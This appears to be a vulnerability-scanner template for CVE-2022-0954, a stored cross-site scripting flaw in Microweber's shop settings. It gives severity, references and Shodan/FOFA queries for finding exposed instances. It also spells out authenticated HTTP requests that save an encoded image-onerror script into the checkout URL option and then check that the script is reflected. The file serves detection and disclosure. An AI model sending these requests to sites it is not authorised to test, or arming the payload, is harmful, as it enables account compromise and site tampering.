id: CVE-2022-0954 info: name: Microweber <1.2.11 - Stored Cross-Site Scripting author: amit-jd severity: medium description: | Microweber before 1.2.1 contains multiple stored cross-site scripting vulnerabilities in Shop's Other Settings, Autorespond E-mail Settings, and Payment Methods. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade Microweber to version 1.2.11 or later to mitigate this vulnerability. reference: - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0954 cwe-id: CWE-79 epss-score: 0.00144 epss-percentile: 0.50194 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: microweber product: microweber shodan-query: - http.favicon.hash:780351152 - http.html:"microweber" fofa-query: - body="microweber" - icon_hash=780351152 tags: cve2022,cve,xss,microweber,huntr http: - raw: - | POST /api/user_login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - | POST /api/save_option HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: {{BaseURL}}/admin/view:shop/action:options option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother - | POST /module/ HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: {{BaseURL}}/admin/view:shop/action:options module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B matchers: - type: dsl dsl: - 'contains(body_2,"true")' - contains(body_3,'\">\" placeholder=\"Use default') - 'contains(header_3,"text/html")' - 'status_code_3==200' condition: and # digest: 490a00463044022071ca52c8427f3d60d45ab20d0d19764a001013f1910d379673a3e56d51dd93e802203981266b94dc753747809a7ec93259634bd21f45c20aeb6e5c9757fa46d72ed5:922c64590222798bb761d5b6d8e72950